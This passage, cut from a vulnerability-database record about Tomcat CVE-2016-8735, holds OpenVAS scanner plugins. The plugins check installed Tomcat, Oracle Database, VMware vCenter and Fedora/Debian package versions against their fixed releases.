Tomcat Remote Code Execution (CVE-2016-8735)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8735"], "modified": "2020-03-27T00:00:00", "id": "CPAI-2016-0968", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:33:52", "description": "This host is installed with Apache Tomcat\n and is prone to code execution vulnerability.", "cvss3": {}, "published": "2017-06-28T00:00:00", "type": "openvas", "title": "Apache Tomcat 'JmxRemoteLifecycleListener' Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-8735"], "modified": "2019-05-10T00:00:00", "id": "OPENVAS:1361412562310810966", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810966", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_tomcat_rce_vuln_jun17.nasl 71279 2017-06-28 16:34:52Z jun$\n#\n# Apache Tomcat 'JmxRemoteLifecycleListener' Remote Code Execution Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810966\");\n script_version(\"2019-05-10T11:41:35+0000\");\n script_cve_id(\"CVE-2016-8735\");\n script_bugtraq_id(94463);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 11:41:35 +0000 (Fri, 10 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-28 17:04:45 +0530 (Wed, 28 Jun 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Apache Tomcat 'JmxRemoteLifecycleListener' Remote Code Execution Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache Tomcat\n and is prone to code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an unspecified error in\n 'JmxRemoteLifecycleListener'.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat before 6.0.48, 7.x before\n 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12.\n Note:This issue exists if JmxRemoteLifecycleListener is used and an attacker\n can reach JMX ports.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 6.0.48, or 7.0.73 or\n 8.0.39 or 8.5.8 or 9.0.0.M13 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2016/q4/502\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\");\n\nif(isnull(tomPort = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:tomPort, exit_no_version:TRUE))\n exit(0);\n\nappVer = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:appVer, test_version:\"6.0.48\")){\n fix = \"6.0.48\";\n}\nelse if(appVer =~ \"^7\\.\")\n{\n if(revcomp(a: appVer, b: \"7.0.73\") < 0){\n fix = \"7.0.73\";\n }\n}\nelse if(appVer =~ \"^8\\.5\\.\")\n{\n if(revcomp(a: appVer, b: \"8.5.8\") < 0){\n fix = \"8.5.8\";\n }\n}\nelse if(appVer =~ \"^8\\.\")\n{\n if(revcomp(a: appVer, b: \"8.0.39\") < 0){\n fix = \"8.0.39\";\n }\n}\nelse if(appVer =~ \"^9\\.\")\n{\n if(revcomp(a: appVer, b: \"9.0.0.M13\") < 0){\n fix = \"9.0.0-M13\";\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:tomPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:54", "description": "This host is running Oracle Database Server\n and is prone to multiple unspecified security vulnerabilities.", "cvss3": {}, "published": "2017-10-18T00:00:00", "type": "openvas", "title": "Oracle Database Server 'WLM' And 'Spatial' Components Multiple Unspecified Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-8735", "CVE-2016-6814"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310811871", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811871", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Database Server 'WLM' And 'Spatial' Components Multiple Unspecified Vulnerabilities\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:database_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811871\");\n script_version(\"2019-05-17T13:14:58+0000\");\n script_cve_id(\"CVE-2016-6814\", \"CVE-2016-8735\");\n script_bugtraq_id(94463, 95429);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 13:14:58 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-18 14:48:23 +0530 (Wed, 18 Oct 2017)\");\n script_name(\"Oracle Database Server 'WLM' And 'Spatial' Components Multiple Unspecified Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Oracle Database Server\n and is prone to multiple unspecified security vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to multiple\n unspecified errors in components 'Spatial (Apache Groovy)' and\n 'WLM (Apache Tomcat)'.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploitation will allow remote\n attackers to affect confidentiality, integrity, and availability\n via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle Database Server version 12.2.0.1\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"oracle_tnslsnr_version.nasl\");\n script_mandatory_keys(\"OracleDatabaseServer/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!dbPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dbVer = get_app_version(cpe:CPE, port:dbPort)){\n exit(0);\n}\n\nif(dbVer == \"12.2.0.1\")\n{\n report = report_fixed_ver(installed_version:dbVer, fixed_version:\"Apply the appropriate patch\");\n security_message(data:report, port:dbPort);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-06T16:40:29", "description": "Mware product updates address critical and important security issues.", "cvss3": {}, "published": "2016-05-26T00:00:00", "type": "openvas", "title": "VMSA-2016-0005 VMware product updates address critical and important security issues", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427", "CVE-2016-2077"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310105731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105731", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2016-0005 VMware product updates address critical and important security issues\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105731\");\n script_cve_id(\"CVE-2016-3427\", \"CVE-2016-2077\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2016-0005 VMware product updates address critical and important security issues\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0005.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"The RMI server of Oracle JRE JMX deserializes any class when deserializing\n authentication credentials. This may allow a remote, unauthenticated attacker to cause deserialization flaws\n and execute their commands.\");\n\n script_tag(name:\"solution\", value:\"Updates are available.\");\n\n script_tag(name:\"summary\", value:\"Mware product updates address critical and important security issues.\");\n\n script_tag(name:\"affected\", value:\"vCenter Server 6.0 on Windows without workaround of KB 2145343\n\n vCenter Server 6.0 on Linux (VCSA) prior to 6.0.0b\n\n vCenter Server 5.5 prior to 5.5 U3d (on Windows), 5.5 U3 (VCSA)\n\n vCenter Server 5.1 prior to 5.1 U3b\n\n vCenter Server 5.0 prior to 5.0 U3e\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-26 11:51:22 +0200 (Thu, 26 May 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\ninclude(\"host_details.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"5.0.0\" )\n if ( int( vcenter_build ) < int( 3073236 ) ) fix = '5.0 U3e (+ KB 2144428 on Windows)';\n\nif( vcenter_version == \"5.1.0\" )\n if ( int( vcenter_build ) < int( 3070521 ) ) fix = '5.1 U3d / 5.1 U3b with KB 2144428 on Windows';\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) < int( 2776510 ) ) fix = '6.0.0b (+ KB 2145343 on Windows)';\n\nif( host_runs( \"Windows\" ) == \"yes\" )\n{\n if( vcenter_version == \"5.5.0\" )\n if ( int( vcenter_build ) < int( 3252642 ) ) fix = '5.5 U3d / 5.5 U3b + KB 2144428';\n}\nelse if( host_runs( \"Linux\" ) == \"yes\" )\n{\n if( vcenter_version == \"5.5.0\" )\n if ( int( vcenter_build ) < int( 3000241 ) ) fix = '5.5 U3';\n}\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat FEDORA-2016-98cca07999", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872149", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872149", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tomcat FEDORA-2016-98cca07999\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872149\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-16 06:03:10 +0100 (Fri, 16 Dec 2016)\");\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-6817\", \"CVE-2016-8735\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tomcat FEDORA-2016-98cca07999\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"tomcat on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-98cca07999\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GROU4JPVEOMXRKCZLSWVE36HA3PSXAEP\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.0.39~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:33", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat FEDORA-2016-a98c560116", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872157", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872157", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tomcat FEDORA-2016-a98c560116\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872157\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-16 06:04:55 +0100 (Fri, 16 Dec 2016)\");\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-6817\", \"CVE-2016-8735\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tomcat FEDORA-2016-a98c560116\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"tomcat on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-a98c560116\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UF4TZRB2ZZISKBSEVHSMDJFYA36MOY2B\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.0.39~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat FEDORA-2016-9c33466fbb", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872150", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872150", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tomcat FEDORA-2016-9c33466fbb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872150\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-16 06:03:12 +0100 (Fri, 16 Dec 2016)\");\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-6817\", \"CVE-2016-8735\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tomcat FEDORA-2016-9c33466fbb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"tomcat on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-9c33466fbb\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PENNFBRKLWKJB57BLHAVVE7N7SNJZAAG\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.0.39~1.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:48", "description": "Multiple security vulnerabilities were\ndiscovered in the Tomcat servlet and JSP engine, as well as in its Debian-specific\nmaintainer scripts. Those flaws allowed for privilege escalation, information\ndisclosure, and remote code execution.\n\nAs part of this update, several regressions stemming from incomplete\nfixes for previous vulnerabilities were also fixed.", "cvss3": {}, "published": "2016-12-18T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3738-1 (tomcat7 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9774", "CVE-2016-6816", "CVE-2016-9775", "CVE-2016-8735"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703738", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703738", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3738.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3738-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703738\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\", \"CVE-2016-9774\", \"CVE-2016-9775\");\n script_name(\"Debian Security Advisory DSA 3738-1 (tomcat7 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-18 00:00:00 +0100 (Sun, 18 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3738.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"tomcat7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 7.0.56-3+deb8u6.\n\nFor the testing (stretch) and unstable (sid) distributions, these\nproblems have been fixed in version 7.0.72-3.\n\nWe recommend that you upgrade your tomcat7 packages.\");\n script_tag(name:\"summary\", value:\"Multiple security vulnerabilities were\ndiscovered in the Tomcat servlet and JSP engine, as well as in its Debian-specific\nmaintainer scripts. Those flaws allowed for privilege escalation, information\ndisclosure, and remote code execution.\n\nAs part of this update, several regressions stemming from incomplete\nfixes for previous vulnerabilities were also fixed.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.72-3\", rls:\"DEB9\")) != NULL) 